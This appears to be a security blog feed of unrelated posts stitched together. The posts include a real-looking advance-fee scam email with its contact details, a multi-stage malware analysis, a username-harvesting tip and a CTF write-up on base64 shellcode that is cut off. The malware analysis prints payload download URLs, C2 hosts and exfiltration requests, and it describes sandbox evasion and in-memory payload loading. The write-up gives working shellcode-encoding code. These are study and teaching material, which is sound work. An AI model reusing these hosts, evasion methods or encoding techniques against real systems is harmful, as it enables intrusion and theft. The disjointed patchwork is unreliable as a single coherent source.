So I asked on Twitter...fucking mistake...after getting past the trolls and well intentioned people that didn't think I understood basic networking/spoofing at all (heart u) link #1,  link #2 as the likely reason I couldn't spoof the IP. As well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later I found https://spoofer.caida.org/recent_tests.php which allows you to check and see if a particular ASN supports spoofing along with the stats that only 20% of the Internet allows spoofing.




source: https://spoofer.caida.org/summary.php

Checking common ISP and cloud provider ASNs showed that most weren't vulnerable to spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.


P.S.
Someone asked if the vuln host was receiving the traffic. I couldn't answer for the initial host but to satisfy my curiosity on the issue  I built a vulnerable NTP server and it did NOT receive the traffic even with hosts from the same VPS provider in the same data center (different subnets).







Hack Naked News #130 – June 20, 2017

Hacking military phone systems, IoT malware activity doubles, more WikiLeaks dumps, decade-old Linux bugs, and more. Jason Wood of Paladin Security joins us to discuss the erosion of ISP privacy rules on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode130Visit https://www.securityweekly.com for all the latest episodes!

Who falls for this?

Sometimes a spammer hits my inbox with something so amusing I feel like I have to share. Check this one out. I can't tell you the last time I received something with such bad grammar, trying so hard to sound official yet catastrophically failing.

Anyway, I think you'll enjoy this one as much as I did.

/---------------------
Federal Bureau of Investigation (FBI)
Anti-Terrorist And Monitory Crime Division.
Federal Bureau Of Investigation.
J.Edgar.Hoover Building Washington Dc
Customers Service Hours / Monday To Saturday
Office Hours Monday To Saturday:
 
Dear Beneficiary,
 
Series of meetings have been held over the past 7 months with the secretary general of the United Nations Organization. This ended 3 days ago. It is obvious that you
 
have not received your fund which is to the tune of $16.5million due to past corrupt Governmental Officials who almost held the fund to themselves for their selfish
 
reason and some individuals who have taken advantage of your fund all in an attempt to swindle your fund which has led to so many losses from your end and unnecessary
 
delay in the receipt of your fund.for more information do get back to us.
 
The National Central Bureau of Interpol enhanced by the United Nations and Federal Bureau of Investigation have successfully passed a mandate to the current Prime
 
Minister of Cambodia Excellency Hun Sen to boost the exercise of clearing all foreign debts owed to you and other individuals and organizations who have been found not
 
to have receive their Contract Sum, Lottery/Gambling, Inheritance and the likes. Now how would you like to receive your payment? because we have two method of  payment
 
which is by Check or by ATM card?
 
ATM Card: We will be issuing you a custom pin based ATM card which you will use to withdraw up to $5,000 per day from any ATM machine that has the Master Card Logo on
 
it and the card have to be renewed in 4 years time which is 2022. Also with the ATM card you will be able to transfer your funds to your local bank account. The ATM
 
card comes with a handbook or manual to enlighten you about how to use it. Even if you do not have a bank account.
Check: To be deposited in your bank for it to be cleared within three working days. Your payment would be sent to you via any of your preferred option and would be
 
mailed to you via FedEx. Because we have signed a contract with FedEx which should expire 25th of June 2017 you will only need to pay $180 instead of $420 saving
 
you $240 so if you
Pay before the one week you save $240 note that any one asking you for some kind of money above the usual fee is definitely a fraudsters and you will have to stop
 
communication with every other person if you have been in contact with any. Also remember that all you will ever have to spend is $180.00 nothing more! Nothing less!
 
And we guarantee the receipt of your fund to be successfully delivered to you within the next 24hrs after the receipt of payment has been confirmed.
 
Note: Everything has been taken care of by the Government of Cambodia,The United Nation and also the FBI and including taxes, custom paper and clearance duty so all
 
you will ever need to pay is $180.
DO NOT SEND MONEY TO ANYONE UNTIL YOU READ THIS: The actual fees for shipping your ATM card is $420 but because FedEx have temporarily discontinued the C.O.D which
 
gives you the chance to pay when package is delivered for international shipping We had to sign contract with them for bulk shipping which makes the fees reduce from
 
the actual fee of $420 to $180 nothing more and no hidden fees of any sort!To effect the release of your fund valued at $16.5million you are advised to contact our
 
correspondent in Asia the delivery officer Miss.Chi Liko with the information below,
 
 
Tele:+855977558948
Email: chiliko7@e-mail.ua
 
You are adviced to contact her with the informations as stated below:
Your full Name..
Your Address:..............
Home/Cell Phone:..............
Preferred Payment Method ( ATM / Cashier Check )
 
 
Upon receipt of payment the delivery officer will ensure that your package is sent within 24 working hours. Because we are so sure of everything we are giving you a
 
100% money back guarantee if you do not receive payment/package within the next 24hrs after you have made the payment for shipping.
 
Yours sincerely,
 
Miss Donna Story
 
FEDERAL BUREAU OF INVESTIGATION
UNITED STATES DEPARTMENT OF JUSTICE
WASHINGTON, D.C. 20535
---------------------\

Enterprise Security Weekly #49 – 7 Layers

Paul and John discuss malware and endpoint defense. In the news, Carbon Black releases Cb Response 6.1, what to ask yourself before committing to a cybersecurity vendor, Malwarebytes replaces antivirus with endpoint protection, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode49Visit https://www.securityweekly.com for all the latest episodes!

False Flag Attack on Multi Stage Delivery of Malware to Italian Organisations

Everything started from a well edited Italian language email (given to me from a colleague of mine, thank you Luca!) reaching out many Italian companies. The Italian language email had a weird attachment: ordine_065.js (it would be "Order Form" in English) which appeared "quite malicious" to me.

By editing the .js attachment it becomes clear that it is not an "order form" but contrary it turns out to be a downloader. The following image shows the .JS content. Our reverse adventure is going to start: we are facing a first stage of infection.

Stage 1: Downloader
The romantic dropper (code on the previous image) downloads and executes a PE file (let's call it Second stage) from 31.148.99.254. The IP address seems to be hosted by a telecommunication company who sells cloud services such as: dedicated servers, colocation systems, and so on located in Ukraine. The used language in the current stage perfectly fits the dropping website language. Please keep in mind this language since later on, it would become a nice find.

By listing the http://31.148.99.254, we might appreciate an nice malware "implant" where multiple files are in place, probably to serve multiple attack vectors (es: emails, or tag inclusions, or script inclusion into benevolent html files). My first analysis was on obf.txt (the following image shows a small piece of it) which woke up my curiosity.

Lateral Analysis: obf.txt
That piece of VB code, could be used to obfuscate VBScripts. Many pieces of code belonging to obf.txt are related to the Russian Script-Coding.com thread where dab00 published it on  2011. Another interesting file is the Certificate.js which shows the following code.

Lateral Analysis: Certificate.js
Quite an original technique to hide a Javascript File ! As you might see private and public keys are quoted by resulting a valid .js file which would be correctly interpreted by a js engine. Following this way, before getting into our real attack path represented by the set.tmp file, from Stage: 1 (ref. Image Stage: 1), the decision landed on performing some slow and intensive manual transformations in order to evaluate the result of GET "http://88.99.112.78/js/P8uph16W" (content in the following image). Certificate.js gets that data and evaluates it through the function: eval(""+Cs+"")

Lateral Analysis: P8uph16W evaluated javascript
Once beautified it becomes easier to read:

Lateral  Analysis: Fresh IoC on Dropper 2
Now, it's obvious that it tries to: (i) download stat.exe from third party web sources, (ii) to rename the downloaded file using the Math.random().toString(36).substr(2, 9) + ".exe" and to (iii) launch it by using the var VTmBaOw = new ActiveXObject("WScript.Shell");  This is super fun and interesting but I am getting faraway from my original attack path.

So, let's assume the downloaded file are the same (really they are not) and lets get back to our original Stage 1 where a romantic .JS dropper downloads the "set.tmp" file and executes it  (please refer to image Stage 1: Downloader).

The dropped file is: 00b42e2b18239585ed423e238705e501aa618dba which is actually evading SandBoxes and AntiVirus engines. It is a PE file which has been implemented in a valid .NET compiled source. Let's call it Stage 2, since coming after the Stage 1 ;). Decompiling the "Second stage" some "ambiguous and oriental characters" appear as content in the "array" variable (please refer to the following code image).

Stage 2: Oriental Characters in array
 By following those "interesting strings" ("interesting strings" by meaning to be faraway from the previous detected language) I landed on a "reflective function" which used a .NET Assembly.Load() to dynamically load the binary translation of the "array"-variable and an EntryPoin.Invoke() to dynamically run the binary. This is a well known .NET technique exploiting the .NET language ability to introspect its own runtime.

Stage 2: Assembly.Load and EntryPoint.Invoke
  
In order to get the dynamically generate binary "array"-variable I decided to patch the Sample code. The following picture shows how the .NET has been patched, in other words by simply forcing the control flow to saves the dynamically generated content on HD (the red breakpoint). In this specific case we are facing a third stage of infection composed by an additional PE file (Let's have a look to HexEditor for the  'MZ' string). Let's call it Stage 3.

Stage 3: Decrypted PE
In order to create the Stage 3, Stage 2 needed to decrypt the binary translation of "array" variable. Analysing the .NET code is not hard to figure out where Stage 2 decrypts the Stage 3. The Decryption loop has been implemented through a simple XOR-based encryption  algorithm within a hardcoded key as shown in the following image.

Stage 2: decryption key
The decrypted new stage (named: Stage 3) happens to be an interpreted PE file as well !  It is built over Microsoft VisualBasic technology (Do you remember the  Lateral Analysis ??) and it's hardy obfuscated (maybe from obf.txt ? ... of course !). The following image shows the Third Stage structure.

Stage 3: Structure
The structures highlights three main modules as follows:

1) Anti Module. Aim of such a module is to implement various evasion techniques in order to weaponize  the sample and block execution on VMs.
2) Service. Aim of such a module is to launch a background service.
3) RunPe. Aim of such a module is to launch an additional encrypted PE file placed in the resource folder.

Let's try to investigare a little bit better what these modules do. The Anti Module tries to figure out if the analysed sample lands on a controlled (emulated and/or simulated) environment in order to change its behaviour. The following images shows some of the performed checks. The sample tries to identify SanBoxie, fiddler and wireshark in order to dynamically change its own behaviour.

Stage 3: evasion checks

The service module tries to spawn a windows service and to disable many Windows features such as for example (but not limited to): EnableLUA, DisableCMD, DisableTaskMgr, etc... The following image shows some of the described actions.

Stage 3: Disabling Windows "Protections"
 Finally the RunPE modules decrypts a further encrypted and embedded resource an tries to run it. The following images show the decryption loop following by the decrypted payload.

Stage 3: Decryption Loop

Stage 3: decrypted payload

On line 253 the Third Stage decrypts the resource and executes it. In the above picture you might appreciate the decrypted sequence: 0x4D, 0x5A, 0x90 which happens to be an additional windows PE. Let's call it Stage: 4.  The new stage appears to be a classic PE file written on C++, we'll need a debugger to get into it.  By analysing its dynamic behaviour (thanks to IDA Pro) it has been easy to catch the dropped files and to understand how that Sample uses them. The following image shows two dropped files  (.nls and .bat) being saved on the HardDrive after the Stage 4 call.


Stage 4: dropping files (.nls and .bat)
The resulting .bat file tries to execute (through cmd.exe /c)  %1 within the parameter %2 as shown in the next picture. If the file to be executed does not exist in HD it deletes the original file as well (itself).

Stage 4: file execution

%1 is an additional dropped PE File while %2 is a "random" value (key? unique id?).

Stage 4: Interesting "keys" passed to the .bat file.
Once the sample is run it performs external requests such the following ones, exfiltrating encrypted informations:

GET /htue503dt/images/uAsMyeumP3uQ/LlAgNzHCWo8/XespJetlxPFFIY/VWK7lnAXnqTCYVX_2BL6O/vcjvx6b8nqcXQKN3/J6ga_2FN2zw6Dv6/r5EUJoPCeuwDIczvFL/kxAqCE1du/yzpHeaF3r0pY4KFUCyu0/jDoN_2BArkLgWaG/fFDxP.gif HTTP/1.1

POST /htue503dt/images/YtDKOb7fgj_2B10L/MN3zDY9V3IPW9vr/JSboSiHV4TAM_2BoCU/LocIRD_2B/MEDnB2QG_2Bf2dbtio8H/_2BLdLdN21RuRQj3xt2/SDWwjjE2JeHnPcsubnBWMG/NJUCRhlTnTa9c/5Dzpqg92/AypuGS6etix2MQvl1C8/V.bmp HTTP/1.1

Conclusions:
Interesting to observe the sample complexity and how it is currently spread over Italian organisations. Interesting (at least on my personal point of view) how False flag attacks are developed in order to confuse the attack attribution (which is nowadays a huge technical issue)  as well. Unfortunately nowadays through the information I have it is not possible to attribute that attack, the dropper has Russian strings on it, one of the payload has "oriental characters" on it, but again I am not able to say the attack is the result of a "joint venture" from Russia and China or it's something hybrid or again it is borrowed or acquire from one to another, etc.. etc... For sure it's not as it appears :D ! 

Index Of Compromise:
Following some of the most interesting Index Of Compromise.

http://88.99.112.78/
http://31.148.99.254/
http://mezzelune.com/arch/stat.exe
http://online.allscapelawnservices.com/arch/stat.exe
http://quotidianoannunci.it/arch/stat.exe
9b8251c21cf500dcb757f68b8dc4164ebbcbf6431282f0b0e114c415f8d84ad0
6456cd84f81b613e35b75ff47f4ccd4d83ec8634b5dcdf77f915fe7380106b28
5ab04878b630d1e0598fb6f74570f653a6bd0753dad9ef55ecf467bee7e618e1
 4605dc8f1bc38075eacf526a1126636aa570fccbe78dca69781cc25edd1a1043
3fc092b52e6220713d2cb098c6d11a56575c241f
610df2672d7cae29e48118a27c4cb2a531e6399b
c304502aa7217399acc0162f41da00dc4add4105
magicians-blog.info
ozarkpatternconcrete.info
androidtutorials.info
executenet.pw
base.vuquoctrung.info/htue503dt
base.magicians-blog.info/htue503dt
base.ozarkpatternconcrete.info/htue503dt
base.androidtutorials.info/htue503dt
executenet.pw/htue503dt

Simple Username Harvesting (from SANS SEC542)

Go to a web site that requires a login. Put in any username with any password. Did the page come back with both the User and Password fields blank? Now put YOUR username in, but with some password you make up. Does the form come back with your username in the User field and nothing in the Password field? If so, here's what you just discovered. The developer is making his form more efficient by not hashing and testing the password to see if it's correct unless the username is valid. If the username IS valid, he populates the User field with it and checks the password. If the password is incorrect, he only clears the Password field so you can retry your password. You just discovered a crude form of username harvesting. Try different usernames and if they remain in the User field, that's a valid account on the server. I know, that would take a lot of time to do it that way. That's why hackers write automated tools.

Belgian DPA Issues Recommendation on DPO Appointment under GDPR

Recently, the Belgian Privacy Commission (the “Belgian DPA”) released a Recommendation (in French and Dutch) regarding the requirement to appoint a data protection officer (“DPO”) under the EU General Data Protection Regulation (“GDPR”).

The Recommendation aims to provide guidance in response to the many questions that the Belgian DPA has received so far regarding the DPO function, in particular regarding the compatibility of the DPO function with other existing functions within a company (e.g., security officer, compliance officer, risk manager, human resources director, IT director).

According to the Belgian DPA, companies must assess such compatibility on a case-by-case basis in order to ensure compliance with the requirements of the GDPR and avoid potential conflict of interests.

In its Recommendation, the Belgian DPA notes that security officers designated under the current Belgian data protection framework cannot automatically be designated as DPO under the GDPR.

In line with the GDPR and the revised guidelines of the Article 29 Working Party published in April 2017, the Recommendation outlines the role and tasks of the DPO under the GDPR, which includes (1) monitoring compliance with the GDPR, (2) assistance with data protection impact assessments, (3) assistance with internal record-keeping obligations and (4) cooperation with data protection authorities. Further, the Belgian DPA recalls that companies that appoint a DPO must (1) consult the DPO for questions related to the protection of personal data, (2) provide the DPO with sufficient resources and (3) ensure that the DPO performs his or her role in an independent manner. The Belgian DPA further lists the qualifications a DPO must have in order to accomplish his or her goals.

The Belgian DPA also recommends that companies document the analysis made on the appointment of a DPO under the GDPR, as well as their final choice with respect to the appointment. It also notes the possibility for companies to appoint external DPOs.

Hack Naked News #129 – June 13, 2017

How to delete an entire company, GameStop suffers a breach, Macs do get viruses, Docker released LinuxKit, and more. Jason Wood of Paladin Security joins us to discuss the military beefing up their cybersecurity reserve on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode129Visit http://www.securityweekly.com for all the latest episodes!

Solving b-64-b-tuff: writing base64 and alphanumeric shellcode

Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There's an easy solution - using an alphanumeric encoder - but what's the fun in that? (also, I didn't think of it :) ). I'm going to cover base64, but these exact same principles apply to alphanumeric - there's absolutely on reason you couldn't change the SET variable in my examples and generate alphanumeric shellcode.

In this post, we're going to write a base64 decoder stub by hand, which encodes some super simple shellcode. I'll also post a link to a tool I wrote to automate this.

I can't promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)

Intro to Shellcode

I don't want to dwell too much on the basics, so I highly recommend reading PRIMER.md, which is a primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge is that you send the server arbitrary binary data. That data would be encoded into base64, then the base64 string was run as if it were machine code. That means that your machine code had to be made up of characters in the set [a-zA-Z0-9+/]. You could also have an equal sign ("=") or two on the end, but that's not really useful.

We're going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it'd be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the commandline, a tool that we'll see used throughout this blog, but I didn't keep that code. Instead, I'm going to use the Crabstone Disassembler, which is Ruby bindings for Capstone:

require 'crabstone'

# Our set of known characters
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

# Create an instance of the Crabstone Disassembler for 32-bit x86
cs = Crabstone::Disassembler.new(Crabstone::ARCH_X86, Crabstone::MODE_32)

# Get every 2-character combination
SET.chars.each do |c1|
  SET.chars.each do |c2|
    # Pad it out pretty far with obvious no-op-ish instructions
    data = c1 + c2 + ("A" * 14)

    # Disassemble it and get the first instruction (we only care about the
    # shortest instructions we can form)
    instruction = cs.disasm(data, 0)[0]

    puts "%s     %s %s" % [
      instruction.bytes.map() { |b| '%02x' % b }.join(' '),
      instruction.mnemonic.to_s,
      instruction.op_str.to_s
    ]
  end
end

I'd probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that's easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that's useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn't be useful, but that I didn't want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls ("int 0x80" in assembly or "\xcd\x80" in machine code; we'll see how that winds up being the most problematic piece!).

For the purposes of this blog, we're going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace

Here's the shellcode we're going to be working with:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

We'll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles to (on Ubuntu, if this fails, try apt-get install nasm):

$ echo -e 'bits 32\n\nmov eax, 0x01\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file
[...]
read(3, "\270\1\0\0\0\273AAAA\315\200", 12) = 12
exit(1094795585)                        = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We're going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm -b32 file
00000000  B801000000        mov eax,0x1
00000005  BB41414141        mov ebx,0x41414141
0000000A  CD80              int 0x80

Easy stuff: NUL byte restrictions

Let's take a quick look at a simple character restriction: NUL bytes. It's commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It's usually pretty straight forward to get rid of NUL bytes by just looking at where they appear and fixing them; it's almost always the case that it's caused by 32-bit moves or values, so we can just switch to 8-bit moves (using eax is 32 bits; using al, the last byte of eax, is 8 bits):

xor eax, eax ; Set eax to 0
inc eax ; Increment eax (set it to 1) - could also use "mov al, 1", but that's one byte longer
mov ebx, 0x41414141 ; Set ebx to the usual value, no NUL bytes here
int 0x80 ; Perform the syscall

We can prove this works, as well (I'm going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e 'bits 32\n\nxor eax, eax\ninc eax\nmov ebx, 0x41414141\nint 0x80\n'> file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  31 c0 40 bb 41 41 41 41  cd 80                    |1.@.AAAA..|

Simple!

Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let's look at the disassembled version so we can see where the problems are:

$ ndisasm -b32 file                               65 [11:16:34]
00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  BB41414141        mov ebx,0x41414141
00000008  CD80              int 0x80

Okay, maybe we aren't so close: the only line that's actually compatible is "inc eax". I guess we can start the long journey!

Let's start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

  • 35 ?? ?? ?? ?? xor eax,0x????????
  • 68 ?? ?? ?? ?? push dword 0x????????
  • 58 pop eax

Let's start with the most naive approach:

push 0
pop eax

If we assemble that, we get:

00000000  6A00              push byte +0x0
00000002  58                pop eax

Close! But because we're pushing 0, we end up with a NUL byte. So let's push something else:

push 0x41414141
pop eax

If we look at how that assembles, we get:

00000000  68 41 41 41 41 58                                 |hAAAAX|

Not only is it all Base64 compatible now, it also spells "hAAAAX", which is a fun coincidence. :)

The problem is, eax doesn't end up as 0, it's 0x41414141. You can verify this by adding "int 3" at the bottom, dumping a corefile, and loading it in gdb (feel free to use this trick throughout if you're following along, I'm using it constantly to verify my code snippings, but I'll only show it when the values are important):

$ ulimit -c unlimited
$ rm core
$ cat file.asm
bits 32

push 0x41414141
pop eax
int 3
$ nasm -o file file.asm
$ ./run_raw_code ./file
allocated 8 bytes of executable memory at: 0x41410000
fish: “./run_raw_code ./file” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Core was generated by `./run_raw_code ./file`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410008 in ?? ()
(gdb) print/x $eax
$1 = 0x41414141

Anyway, if we don't like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let's do that:

push 0x41414141
pop eax
xor eax, 0x41414141

Which assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41                 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let's look at why!

We'll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      if((b1 ^ b2) == b)
        return [b1, b2]
      end
    end
  end
  puts("Error: Couldn't encode 0x%02x!" % b)
  return nil
end

0.upto(255) do |i|
  puts("%x => %s" % [i, find_bytes(i)])
end

The full output is here, but the summary is:

0 => [65, 65]
1 => [66, 67]
2 => [65, 67]
3 => [65, 66]
...
7d => [68, 57]
7e => [70, 56]
7f => [70, 57]
Error: Couldn't encode 0x80!
80 =>
Error: Couldn't encode 0x81!
81 =>
Error: Couldn't encode 0x82!
82 =>
...

Basically, we can encode any value that doesn't have the most-significant bit set (ie, anything under 0x80). That's going to be a problem that we'll deal with much, much later.

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32(desired)
  # Convert the integer into a string (pack()), then into the four bytes
  b1, b2, b3, b4 = [desired].pack('N').bytes()

  v1 = find_bytes(b1)
  v2 = find_bytes(b2)
  v3 = find_bytes(b3)
  v4 = find_bytes(b4)

  # Convert both sets of xor values back into integers
  result = [
    [v1[0], v2[0], v3[0], v4[0]].pack('cccc').unpack('N').pop(),
    [v1[1], v2[1], v3[1], v4[1]].pack('cccc').unpack('N').pop(),
  ]


  # Note: I comment these out for many of the examples, simply for brevity
  puts '0x%08x' % result[0]
  puts '0x%08x' % result[1]
  puts('----------')
  puts('0x%08x' % (result[0] ^ result[1]))
  puts()

  return result
end

This function takes a single 32-bit value and it outputs the two xor values (note that this won't work when the most significant bit is set.. stay tuned for that!):

irb(main):039:0> get_xor_values_32(0x01020304)
0x42414141
0x43434245
----------
0x01020304

=> [1111572801, 1128481349]

irb(main):040:0> get_xor_values_32(0x41414141)
0x6a6a6a6a
0x2b2b2b2b
----------
0x41414141

=> [1785358954, 724249387]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:

get_xor_values_32(0x01)
0x41414142
0x41414143
----------
0x00000001

=> [1094795586, 1094795587]

Then write the shellcode:

push 0x41414142
pop eax
xor eax, 0x41414143

And prove to ourselves that it's base-64-compatible; I believe in doing this, because every once in awhile an instruction like "inc eax" (which becomes '@') will slip in when I'm not paying attention:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41                 |hBAAAX5CAAA|

We'll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It's the most fundamental building block of this project!

Setting other registers

Sadly, unless I missed something, there's no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don't have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

  • 58 pop eax
  • 59 pop ecx
  • 5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142
pop eax
xor eax, 0x41414143 ; eax -> 1
push eax
pop ecx ; ecx -> 1

Then verify the base64-ness:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 59           |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 5b           |hBAAAX5CAAAP[|

Note the "[" at the end - that's not in our character set! So we're pretty much limited to using eax, ecx, and edx for most things.

But wait, there's more! We do, however, have access to popad. The popad instruction pops the next 8 things off the stack and puts them in all 8 registers. It's a bit of a scorched-earth method, though, because it overwrites all registers. We're going to use it at the start of our code to zero-out all the registers.

Let's try to convert our exit shellcode from earlier:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Into something that's base-64 friendly:

; We'll start by populating the stack with 0x41414141's
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141

; Then popad to set all the registers to 0x41414141
popad

; Then set eax to 1
push 0x41414142
pop eax
xor eax, 0x41414143

; Finally, do our syscall (as usual, we're going to ignore the fact that the syscall isn't base64 compatible)
int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file
00000000  68 41 41 41 41 68 41 41  41 41 68 41 41 41 41 68  |hAAAAhAAAAhAAAAh|
00000010  41 41 41 41 68 41 41 41  41 68 41 41 41 41 68 41  |AAAAhAAAAhAAAAhA|
00000020  41 41 41 68 41 41 41 41  61 68 42 41 41 41 58 35  |AAAhAAAAahBAAAX5|
00000030  43 41 41 41 cd 80                                 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file
...
read(3, "hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA"..., 54) = 54
exit(1094795585)                        = ?

Encoding the actual code

You've probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it's our working register). And what if you need an instruction (like add, or shift) that isn't available? Do we just simulate it?

As I'm sure you've noticed, the machine code is just a bunch of bytes. What's stopping us from simply encoding the machine code rather than just values?

Let's take our original example of an exit again:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Because 'mov' assembles to 0xb8XXXXXX, I don't want to deal with that yet (the most-significant bit is set). So let's change it a bit to keep each byte (besides the syscall) under 0x80:

00000000  6A01              push byte +0x1
00000002  58                pop eax
00000003  6841414141        push dword 0x41414141
00000008  5B                pop ebx

Or, as a string of bytes:

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b"

Let's pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with 'A', because it's as good a character as any):

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"

then break that string into 4-byte chunks, encoding as little endian (reverse byte order):

  • 6a 01 58 68 -> 0x6858016a
  • 41 41 41 41 -> 0x41414141
  • 5b 41 41 41 -> 0x4141415b

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main):047:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x6858016a)
0x43614241 ^ 0x2b39432b

irb(main):048:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41414141)
0x6a6a6a6a ^ 0x2b2b2b2b

irb(main):050:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x4141415b)
0x6a6a6a62 ^ 0x2b2b2b39

Let's start our decoder by simply calculating each of these values in eax, just to prove that they're all base64-compatible (note that we are simply discarding the values in this example, we aren't doing anything with them quite yet):

push 0x43614241
pop eax
xor eax, 0x2b39432b ; 0x6858016a

push 0x6a6a6a6a
pop eax
xor eax, 0x2b2b2b2b ; 0x41414141

push 0x6a6a6a62
pop eax
xor eax, 0x2b2b2b39 ; 0x4141415b

Which assembles to:

$ hexdump -Cv file
00000000  68 41 42 61 43 58 35 2b  43 39 2b 68 6a 6a 6a 6a  |hABaCX5+C9+hjjjj|
00000010  58 35 2b 2b 2b 2b 68 62  6a 6a 6a 58 35 39 2b 2b  |X5++++hbjjjX59++|
00000020  2b                                                |+|

Looking good so far!

Decoder stub

Okay, we've proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We'll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let's look back at the list of available instructions! After some searching, I found one that's promising:

3151??            xor [ecx+0x??],edx

This command xors the 32-bit value at memory address ecx+0x?? with edx. We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly edx. Since the "0x??" value has to also be a base64 character, we'll follow our trend and use [ecx+0x41], which gives us:

315141            xor [ecx+0x41],edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that's basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let's start by looking at the steps involved:

  • Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)
